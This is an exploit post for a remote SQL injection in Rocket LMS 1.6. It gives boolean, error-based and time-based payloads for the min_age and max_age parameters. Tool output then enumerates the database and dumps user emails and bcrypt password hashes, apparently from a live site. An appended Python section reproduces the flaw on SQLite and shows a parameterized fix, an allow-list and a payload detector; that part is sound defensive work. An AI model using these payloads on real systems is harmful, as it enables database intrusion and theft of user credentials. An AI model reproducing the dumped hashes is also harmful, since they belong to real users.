Rocket LMS 1.6 SQL Injection
Rocket LMS version 1.6 suffers from a remote SQL injection vulnerability.
CraCkEr
THE CRACK OF ETERNAL MIGHT
From The Ashes and Dust Rises An Unimaginable crack...
[ Exploits ]
Author    : CraCkEr
Website   : rocket-soft.org
Vendor    : RocketSoft
Software  : Rocket LMS v 1.6
Vuln Type : Remote SQL Injection
Method    : GET
Impact    : Database Access

Rocket LMS - Learning Management System is an online course marketplace with a pile of features that helps you to run your online education business easily.

B4nks-NET irc.b4nks.tk #unix
Release Notes:
==============
Typically used for remotely exploitable vulnerabilities that can lead to system compromise.
Greets:
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL
Ivo @palaziv
CryptoJob (Twitter) twitter.com/CryptozJob
© CraCkEr 2022
GET parameter 'min_age' is vulnerable
Parameter: min_age (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=(SELECT (CASE WHEN (8536=8536) THEN 18 ELSE (SELECT 7625 UNION SELECT 1202) END))&max_age=99&day[]=saturday&min_time=&max_time=&country_id=
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(1687=1687,1))),0x71786a6a71),1687)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND (SELECT 2819 FROM (SELECT(SLEEP(5)))SBYp)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=
GET parameter 'max_age' is vulnerable
Parameter: max_age (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=(SELECT (CASE WHEN (2763=2763) THEN 99 ELSE (SELECT 3665 UNION SELECT 7462) END))&day[]=saturday&min_time=&max_time=&country_id=
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(5555=5555,1))),0x71786a6a71),5555)&day[]=saturday&min_time=&max_time=&country_id=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND (SELECT 2169 FROM (SELECT(SLEEP(5)))mngI)&day[]=saturday&min_time=&max_time=&country_id=
[+] Starting the Attack
[INFO] fetching current database
[INFO] the back-end DBMS is MySQL
web application technology: Apache 2, PHP 7.4.30
back-end DBMS: MySQL >= 5.6
current database: 'admin_learn'
[INFO] fetching tables for database: 'admin_learn'
Database: admin_learn
[184 tables]
+------------------------------------------------+
| groups |
| accounting |
| advertising_banners |
| advertising_banners_translations |
| affiliates |
| affiliates_codes |
| agora_history |
| badge_translations |
| badges |
| become_instructors |
| blog |
| blog_categories |
| blog_translations |
| bundle_filter_option |
| bundle_translations |
| bundle_webinars |
| bundles |
| cart |
| categories |
| category_translations |
| certificate_template_translations |
| certificates |
| certificates_templates |
| comments |
| comments_reports |
| contacts |
| course_forum_answers |
| course_forums |
| course_learning |
| course_noticeboard_status |
| course_noticeboards |
| delete_account_requests |
| discount_categories |
| discount_courses |
| discount_groups |
| discount_users |
| discounts |
| faq_translations |
| faqs |
| favorites |
| feature_webinar_translations |
| feature_webinars |
| file_translations |
| files |
| filter_option_translations |
| filter_options |
| filter_translations |
| filters |
| follows |
| forum_featured_topics |
| forum_recommended_topic_items |
| forum_recommended_topics |
| forum_topic_attachments |
| forum_topic_bookmarks |
| forum_topic_likes |
| forum_topic_posts |
| forum_topic_reports |
| forum_topics |
| forum_translations |
| forums |
| group_users |
| groups_registration_packages |
| home_sections |
| jazzcash_transactions |
| meeting_times |
| meetings |
| migrations |
| navbar_button_translations |
| navbar_buttons |
| newsletters |
| newsletters_history |
| noticeboards |
| noticeboards_status |
| notification_templates |
| notifications |
| notifications_status |
| offline_payments |
| order_items |
| orders |
| page_translations |
| pages |
| password_resets |
| payku_payments |
| payku_transactions |
| payment_channels |
| payouts |
| payu_transactions |
| permissions |
| prerequisites |
| product_categories |
| product_category_translations |
| product_discounts |
| product_faq_translations |
| product_faqs |
| product_file_translations |
| product_files |
| product_filter_option_translations |
| product_filter_options |
| product_filter_translations |
| product_filters |
| product_media |
| product_orders |
| product_reviews |
| product_selected_filter_options |
| product_selected_specification_multi_values |
| product_selected_specification_translations |
| product_selected_specifications |
| product_specification_categories |
| product_specification_multi_value_translations |
| product_specification_multi_values |
| product_specification_translations |
| product_specifications |
| product_translations |
| products |
| promotion_translations |
| promotions |
| purchases |
| quiz_question_translations |
| quiz_translations |
| quizzes |
| quizzes_questions |
| quizzes_questions_answer_translations |
| quizzes_questions_answers |
| quizzes_results |
| rating |
| regions |
| registration_packages |
| registration_packages_translations |
| reserve_meetings |
| rewards |
| rewards_accounting |
| roles |
| sales |
| sales_log |
| sections |
| session_reminds |
| session_translations |
| sessions |
| setting_translations |
| settings |
| special_offers |
| subscribe_reminds |
| subscribe_translations |
| subscribe_uses |
| subscribes |
| support_conversations |
| support_department_translations |
| support_departments |
| supports |
| tags |
| testimonial_translations |
| testimonials |
| text_lesson_translations |
| text_lessons |
| text_lessons_attachments |
| ticket_translations |
| ticket_users |
| tickets |
| trend_categories |
| users |
| users_badges |
| users_cookie_security |
| users_manual_purchase |
| users_metas |
| users_occupations |
| users_registration_packages |
| users_zoom_api |
| verifications |
| webinar_assignment_attachments |
| webinar_assignment_history |
| webinar_assignment_history_messages |
| webinar_assignment_translations |
| webinar_assignments |
| webinar_chapter_items |
| webinar_chapter_translations |
| webinar_chapters |
| webinar_extra_description_translations |
| webinar_extra_descriptions |
| webinar_filter_option |
| webinar_partner_teacher |
| webinar_reports |
| webinar_reviews |
| webinar_translations |
| webinars |
+------------------------------------------------+
[INFO] fetching columns for table 'users' in database 'admin_learn'
Database: admin_learn
Table: users
[49 columns]
+--------------------+-------------------------------------+
| Column             | Type                                |
+--------------------+-------------------------------------+
| language | varchar(255) |
| about | text |
| access_content | tinyint(1) |
| account_id | varchar(128) |
| account_type | varchar(128) |
| address | varchar(255) |
| affiliate | tinyint(1) |
| avatar | varchar(255) |
| avatar_settings | varchar(255) |
| ban | tinyint(1) |
| ban_end_at | int(10) unsigned |
| ban_start_at | int(10) unsigned |
| bio | varchar(128) |
| can_create_store | tinyint(1) |
| certificate | varchar(128) |
| city_id | int(10) unsigned |
| commission | int(10) unsigned |
| country_id | int(10) unsigned |
| cover_img | varchar(255) |
| created_at | int(11) |
| deleted_at | int(11) |
| district_id | int(10) unsigned |
| email | varchar(255) |
| facebook_id | varchar(255) |
| financial_approval | tinyint(1) |
| full_name | varchar(128) |
| google_id | varchar(255) |
| headline | varchar(255) |
| iban | varchar(128) |
| id | int(10) unsigned |
| identity_scan | varchar(128) |
| level_of_training | bit(3) |
| location | point |
| meeting_type | enum('all','in_person','online') |
| mobile | varchar(32) |
| newsletter | tinyint(1) |
| offline | tinyint(1) |
| offline_message | text |
| organ_id | int(11) |
| password | varchar(255) |
| province_id | int(10) unsigned |
| public_message | tinyint(1) |
| remember_token | varchar(255) |
| role_id | int(10) unsigned |
| role_name | varchar(64) |
| status | enum('active','pending','inactive') |
| timezone | varchar(255) |
| updated_at | int(11) |
| verified | tinyint(1) |
+--------------------+-------------------------------------+
[INFO] fetching entries of column(s) 'account_id,account_type,email,id,password' for table 'users' in database 'admin_learn'
Database: admin_learn
Table: users
[4 entries]
+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+
| id   | account_id    | account_type        | email                       | password                                                     |
+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+
| 1 | NULL | NULL | [email protected] | $2y$10$nSUg1Z2rltHGecudC6dEEeRoqfIhlHi8WaAFFQs57oyFtpkvvQufW |
| 867 | NULL | NULL | [email protected] | $2y$10$W0.rfZgYCWGr/rOSrGrGg.Nnm6xBVdR3FYjJiXqiq6LZdx2Ds.aXq |
| 995 | NULL | NULL | [email protected] | $2y$10$Hc4OzTkL3i5vmHXXvZvSfOsZDMD/XYwO4yS8UOtUIAFQcXYhIIJsa |
| 1015 | NULL | NULL | [email protected] | $2y$10$8.jgtS/cg8L6HfuuBgWnkeg49r0LiY7kofR6eiY9b.mx747i82n.u |
+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+
[-] Done
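Added example, not part of the advisory and not Rocket LMS code: a Python stand-in that reproduces the min_age/max_age injection class shown above on an in-memory SQLite table, next to the two fixes a maintainer would apply (a strict integer allow-list and a parameterized query) and a request-level check that flags the advisory's payloads in a query string. The advisory does not show the application's query, so the string-spliced query here is an assumption about the vulnerable pattern; the users rows and the request strings are constructed, and all function names (make_db, search_vulnerable, parse_age, search_hardened, flag_request, build_query) are mine.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed sample rows; the Rocket LMS schema listed above is not reproduced.
SAMPLE_USERS = [(1, "alice", 25), (2, "bob", 17), (3, "carol", 40)]

# Boolean-based payload from the advisory (min_age), decoded form, plus a copy
# with the condition made false to show the true/false oracle it gives.
TRUE_PAYLOAD = "(SELECT (CASE WHEN (8536=8536) THEN 18 ELSE (SELECT 7625 UNION SELECT 1202) END))"
FALSE_PAYLOAD = TRUE_PAYLOAD.replace("8536=8536", "8536=8537")

# Parameters that the search endpoint treats as numbers (assumed from the request above).
NUMERIC_PARAMS = {"min_age", "max_age", "min_price", "max_price", "category_id", "country_id"}
# Keywords that appear in the advisory's three payload families.
SQL_HINTS = re.compile(r"\b(SELECT|CASE\s+WHEN|UNION|SLEEP|GTID_SUBSET|ELT|CONCAT)\b", re.I)


def make_db():
    """Stand-in for the application's MySQL: an in-memory SQLite users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, full_name TEXT, age INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def search_vulnerable(conn, min_age, max_age):
    """Assumed vulnerable pattern: the filter values are spliced into the SQL text."""
    sql = f"SELECT id FROM users WHERE age >= {min_age} AND age <= {max_age}"
    return [row[0] for row in conn.execute(sql)]


def parse_age(value, lo=0, hi=150):
    """Allow-list check: only an unsigned decimal integer inside [lo, hi] passes."""
    if not re.fullmatch(r"\d{1,3}", value):
        raise ValueError(f"rejected age filter: {value!r}")
    n = int(value)
    if not lo <= n <= hi:
        raise ValueError(f"age filter out of range: {n}")
    return n


def search_hardened(conn, min_age, max_age):
    """Validate first, then bind the values as parameters; no SQL is built from input."""
    lo, hi = parse_age(min_age), parse_age(max_age)
    sql = "SELECT id FROM users WHERE age >= ? AND age <= ?"
    return [row[0] for row in conn.execute(sql, (lo, hi))]


def build_query(min_age, max_age):
    """Constructed request: the advisory's parameter set with the two age values substituted."""
    return (
        "sort=top_rate&category_id=520&level_of_training=beginner&gender=man"
        "&role=teacher&meeting_type=all&population=all&min_price=&max_price="
        f"&min_age={min_age}&max_age={max_age}&day[]=saturday&min_time=&max_time=&country_id="
    )


def flag_request(query_string):
    """Detection over one request's query string; returns (param, reason) findings."""
    findings = []
    for name, values in parse_qs(query_string, keep_blank_values=True).items():
        for v in values:
            if v == "":
                continue
            if name in NUMERIC_PARAMS and not re.fullmatch(r"\d+", v):
                findings.append((name, "non-numeric value in numeric filter"))
            elif SQL_HINTS.search(v):
                findings.append((name, "SQL keywords in parameter value"))
    return findings


if __name__ == "__main__":
    db = make_db()
    # True condition: the CASE yields 18, so the spliced query returns the same rows as min_age=18.
    print(search_vulnerable(db, TRUE_PAYLOAD, "99"))
    # False condition: the ELSE subquery is evaluated instead. SQLite silently takes its first
    # row (no match); MySQL raises "Subquery returns more than 1 row", which is the oracle used above.
    print(search_vulnerable(db, FALSE_PAYLOAD, "99"))
    print(search_hardened(db, "18", "99"))
    print(flag_request(build_query(TRUE_PAYLOAD, "99")))
```

The allow-list in parse_age is what actually closes the hole: binding alone would make the payload a harmless string, but a numeric filter that silently accepts arbitrary text still hides the probe, whereas rejecting it gives the application a clean error and gives the logs a signal that flag_request can pick up.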